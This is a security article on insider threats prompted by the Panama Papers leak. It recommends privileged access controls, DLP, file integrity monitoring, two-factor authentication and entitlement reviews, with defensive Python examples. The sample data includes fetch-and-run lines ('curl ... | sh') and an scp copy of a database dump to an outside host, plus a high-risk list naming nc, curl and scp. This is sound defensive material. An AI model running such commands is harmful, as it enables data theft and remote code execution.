Zero-day exploits. SQL injection. Malware. There’s plenty to worry about as a security professional. But none of those attack vectors were part of the recent massive data leak at Panamanian law firm Mossack Fonseca. This attack appears to be a good old-fashioned inside job.
Over the last year, an anonymous inside source has provided German newspaper Süddeutsche Zeitung with 11.5 million sensitive banking documents covering 214,488 offshore entities.
The fallout for world leaders has already included the resignation of Iceland's Prime Minister and of a member of the FIFA ethics panel. There is mounting pressure on banks and world leaders, and Panama's national police have raided Mossack Fonseca. Future business for the firm will undoubtedly dry up.
The growing trend of leaks, and the motivations behind them
This leak is one of a string of insider revelations, such as the WikiLeaks disclosures of 2010, Edward Snowden's disclosures of NSA operations in 2013, the Ashley Madison hack of 2015 and the Swiss Leaks of 2015, all of which significantly damaged the organizations involved.
Malicious insiders have traditionally been motivated by financial gain, such as the AT&T employees who installed unauthorized software in September 2015 that gave a third party the ability to unlock customer mobile devices, in return for $20,000. But this recent series of leaks demonstrates the rising role of ethical motivation among attackers, or "hacktivism".
Disgruntled employees, or employees leaving a company, are also motivated to exfiltrate data. Earlier this year, a data loss prevention (DLP) tool at the Federal Deposit Insurance Corp. (FDIC) detected the download of 44,000 banking customers’ information by an employee leaving the agency. The employee claimed that the data exfiltration was inadvertent and returned the personal device with the downloaded data four days later.
The point is that knowing the motivations for insider attacks allows a measure of preparation: where to implement controls and where to look for potential data loss. Smart security professionals will include in this evaluation the data a hacktivist would most want to expose, not just the data a thief could sell.
The controls that should be considered
There is no silver bullet that eliminates the risk posed by malicious, or even negligent, insiders. But the most obvious controls to consider are provided by privileged access management. In several of these examples, system administrators were able to walk away with information without prevention or detection. Some were even able to intentionally install malware. To reduce the risk, consider controls that limit the commands that super users or administrators can run (a per-role command allowlist rather than blanket root), together with privileged session management that monitors or records activity. A recorded session is both a detective control and the evidence a prosecution needs, and the credible threat of prosecution deters malicious acts.
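The command-allowlist idea above can be applied to a session recording after the fact as well as at sudo time. The following is an added example, not code from the original article: it parses constructed session-proxy log lines, strips `sudo` and environment prefixes to find the program actually run, and flags anything outside the role's allowlist or on a high-risk list (tools that move data off the host or change what runs on it). The log format, role names, allowlists and the 203.0.113.9 host are assumptions.

```python
"""Review recorded privileged-session commands against a per-role allowlist.

Added example, not code from the original article. The log format, roles,
allowlist and sample lines are constructed for illustration.
"""
import re
import shlex
from dataclasses import dataclass

# Assumed line format from a session-recording proxy:
#   <ISO timestamp> user=<name> role=<role> cmd=<full command line>
LOG_RE = re.compile(r"^(?P<ts>\S+) user=(?P<user>\S+) role=(?P<role>\S+) cmd=(?P<cmd>.*)$")

# Assumed allowlist: program names each role may run. Anything else is flagged.
ALLOWLIST = {
    "dba": {"psql", "pg_dump", "systemctl", "tail", "less"},
    "sysadmin": {"systemctl", "journalctl", "tail", "less", "df", "top"},
}

# Assumed high-risk programs: exfiltration channels and software installers.
HIGH_RISK = {"scp", "rsync", "curl", "wget", "nc", "apt-get", "yum", "pip", "make"}


@dataclass
class Finding:
    ts: str
    user: str
    role: str
    executable: str
    reason: str


def executable_of(cmdline: str) -> str:
    """Return the program name of a command line, ignoring a leading `sudo`,
    `sudo -u USER`, other leading options and VAR=value prefixes, and
    dropping any directory part ('sudo FOO=1 /usr/bin/scp a b' -> 'scp')."""
    try:
        parts = shlex.split(cmdline)
    except ValueError:                      # unbalanced quotes in the capture
        parts = cmdline.split()
    i = 0
    while i < len(parts):
        part = parts[i]
        if part == "-u" and i + 1 < len(parts):   # sudo -u <user>
            i += 2
            continue
        if part == "sudo" or part.startswith("-") or "=" in part:
            i += 1
            continue
        return part.rsplit("/", 1)[-1]
    return ""


def review_session(lines):
    """Return one Finding per logged command that is high-risk or outside
    the allowlist for the user's role; allowed commands produce nothing."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                        # not a command record
        exe = executable_of(m["cmd"])
        allowed = ALLOWLIST.get(m["role"], set())
        if exe in HIGH_RISK:
            reason = "high-risk executable"
        elif exe not in allowed:
            reason = "not in role allowlist"
        else:
            continue
        findings.append(Finding(m["ts"], m["user"], m["role"], exe, reason))
    return findings


# Constructed sample: a DBA dumps a table and copies it to an outside host,
# and a sysadmin pipes a remote script into a shell.
SAMPLE_LOG = [
    '2016-04-05T09:12:01Z user=alice role=dba cmd=psql -c "select count(*) from clients"',
    "2016-04-05T09:14:44Z user=alice role=dba cmd=sudo pg_dump --file=/tmp/clients.sql clients",
    "2016-04-05T09:15:10Z user=alice role=dba cmd=scp /tmp/clients.sql alice@203.0.113.9:~/",
    "2016-04-05T09:20:33Z user=bob role=sysadmin cmd=systemctl restart nginx",
    "2016-04-05T09:21:02Z user=bob role=sysadmin cmd=curl -s http://203.0.113.9/agent.sh | sh",
]

if __name__ == "__main__":
    for f in review_session(SAMPLE_LOG):
        print(f"{f.ts} {f.user} ({f.role}) ran {f.executable}: {f.reason}")
```

The same allowlist expressed in sudoers would stop the `scp` before it ran; running it over the recording catches the cases where the administrator already had a full shell.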
Data loss prevention can detect exfiltration in progress, as it did at the FDIC, and is an important control, but it should be augmented. Group Policy can block writes to removable storage (Computer Configuration > Administrative Templates > System > Removable Storage Access), closing the USB channel that DLP would otherwise have to catch. File integrity monitoring can check binaries, configuration and audit rules for unexpected changes, which is how an administrator installing unauthorized software shows up.
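A minimal file integrity monitor, as an added example that is not code from the original article: it records a SHA-256 digest and mode bits for every regular file under a root, then reports files added, removed or changed since that baseline. `demo()` builds a constructed tree in a temporary directory and simulates an administrator replacing a binary, dropping a script and deleting an audit rule; the paths and contents are invented for the demonstration.

```python
"""File integrity monitoring: baseline a tree, then report drift.

Added example, not code from the original article. demo() constructs a
throwaway directory tree purely to exercise the functions.
"""
import hashlib
import os
import tempfile
from pathlib import Path

CHUNK = 1 << 16


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map each regular file under root (relative POSIX path) to its digest
    and permission bits. Symlinks are recorded neither as files nor followed,
    so a link pointing outside the tree cannot smuggle content into the scan."""
    baseline = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()                     # deterministic order
        for name in sorted(filenames):
            p = Path(dirpath) / name
            if p.is_symlink() or not p.is_file():
                continue
            rel = p.relative_to(root).as_posix()
            baseline[rel] = {
                "sha256": sha256_file(p),
                "mode": oct(p.stat().st_mode & 0o777),
            }
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Diff two baselines. A change in either digest or mode is 'modified'."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(k for k in set(baseline) & set(current) if baseline[k] != current[k])
    return {"added": added, "removed": removed, "modified": modified}


def demo() -> dict:
    """Baseline a constructed tree, then simulate an insider who replaces a
    tool with a downloader, drops an exfiltration script and removes an
    audit rule; return what the monitor reports."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "etc" / "audit").mkdir(parents=True)
        (root / "bin" / "unlock-tool").write_bytes(b"#!/bin/sh\necho ok\n")
        (root / "etc" / "audit" / "rules").write_text("-w /etc/passwd -p wa\n")
        (root / "etc" / "motd").write_text("authorized use only\n")
        baseline = build_baseline(root)

        # Tampering (constructed): 203.0.113.9 is a documentation address.
        (root / "bin" / "unlock-tool").write_bytes(b"#!/bin/sh\ncurl http://203.0.113.9/x | sh\n")
        (root / "bin" / "exfil.py").write_text("import shutil\n")
        (root / "etc" / "audit" / "rules").unlink()
        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

In production the baseline must live somewhere the monitored host's administrators cannot rewrite it, otherwise the same person who changes the file can re-baseline it.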
There is also a threat from outsiders obtaining legitimate insider credentials and abusing those privileges. One way to reduce that risk is to require two-factor authentication for access to sensitive information and intellectual property. If a user falls victim to a phishing attack or has their credentials compromised through social engineering, the attacker still has to obtain the second factor, such as a biometric input or a device the user possesses. One caveat: a one-time code typed into a web page can itself be phished in real time, so a factor bound to the device or the origin is stronger than a code alone.
Finally, an effective Identity Governance program should be in place, not only for compliance purposes, but to reduce the risk of excessive access. If an inside attack happens, minimized rights limit the potential damage. A regular collection and certification of entitlements should highlight access that falls outside policy, including access retained by people who have changed roles or left, and should govern the process of revoking it.
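The certification step can be automated against a role policy. The following is an added example, not code from the original article: it takes a constructed HR feed and a constructed entitlement collection, flags entitlements that are orphaned (no account), held by a terminated account, outside the holder's role, or in breach of a separation-of-duty rule, and emits a revocation list. The roles, entitlement names and accounts are assumptions for illustration.

```python
"""Entitlement certification against a role policy.

Added example, not code from the original article. Roles, entitlement
names, the separation-of-duty rule and all accounts are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass

# Assumed policy: the entitlements each job role is permitted to hold.
ROLE_POLICY = {
    "paralegal": {"dms:read", "email:user"},
    "partner": {"dms:read", "dms:write", "email:user",
                "billing:read", "billing:submit", "billing:approve"},
    "sysadmin": {"dms:admin", "email:admin", "vpn:admin"},
}

# Assumed separation-of-duty rule: nobody may both submit and approve a bill.
SEPARATION_OF_DUTY = [("billing:submit", "billing:approve")]


@dataclass(frozen=True)
class Account:
    user: str
    role: str
    employed: bool


@dataclass(frozen=True)
class Finding:
    user: str
    entitlement: str
    reason: str


def certify(accounts, entitlements, policy=ROLE_POLICY, sod=SEPARATION_OF_DUTY):
    """Compare collected (user, entitlement) pairs with the policy and return
    every holding that should not exist."""
    by_user = {a.user: a for a in accounts}
    held = defaultdict(set)
    for user, ent in entitlements:
        held[user].add(ent)
    findings = []
    for user in sorted(held):
        acct = by_user.get(user)
        for ent in sorted(held[user]):
            if acct is None:
                findings.append(Finding(user, ent, "orphaned: no matching account"))
            elif not acct.employed:
                findings.append(Finding(user, ent, "account terminated"))
            elif ent not in policy.get(acct.role, set()):
                findings.append(Finding(user, ent, f"outside policy for role {acct.role}"))
        for a, b in sod:
            if a in held[user] and b in held[user]:
                findings.append(Finding(user, b, f"separation of duty: conflicts with {a}"))
    return findings


def revocation_list(findings):
    """Distinct (user, entitlement) pairs to revoke, in a stable order."""
    return sorted({(f.user, f.entitlement) for f in findings})


# Constructed sample data: an HR feed and a collected entitlement snapshot.
ACCOUNTS = [
    Account("alice", "partner", True),
    Account("bob", "paralegal", True),
    Account("carol", "sysadmin", True),
    Account("dave", "paralegal", False),    # left the firm, account still holds access
]
ENTITLEMENTS = [
    ("alice", "dms:read"), ("alice", "dms:write"), ("alice", "email:user"),
    ("alice", "billing:submit"), ("alice", "billing:approve"),
    ("bob", "dms:read"), ("bob", "email:user"), ("bob", "dms:write"),
    ("carol", "dms:admin"), ("carol", "email:admin"), ("carol", "vpn:admin"),
    ("carol", "billing:read"),
    ("dave", "dms:read"), ("dave", "email:user"),
    ("eve", "vpn:admin"),                   # no HR record for eve at all
]


def run_sample():
    return certify(ACCOUNTS, ENTITLEMENTS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.user:6} {f.entitlement:16} {f.reason}")
    print("revoke:", revocation_list(run_sample()))
```

The findings are the input to the human certification, not its replacement: a manager signs off on each revocation, and anything unsigned after the deadline is revoked by default.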
Keeping up with threats is a tireless, thankless job, and not every threat applies to every organization. But when a story as big as the Panama Papers breaks, it is an opportunity to evaluate what level of risk your own organization is exposed to. With old-fashioned insider threats, every organization has some level of vulnerability, and board members will be taking notice. It might be a good time to make the case for budget to address it.
Related Reading: The Emergence of Identity as an Enterprise Attack Surface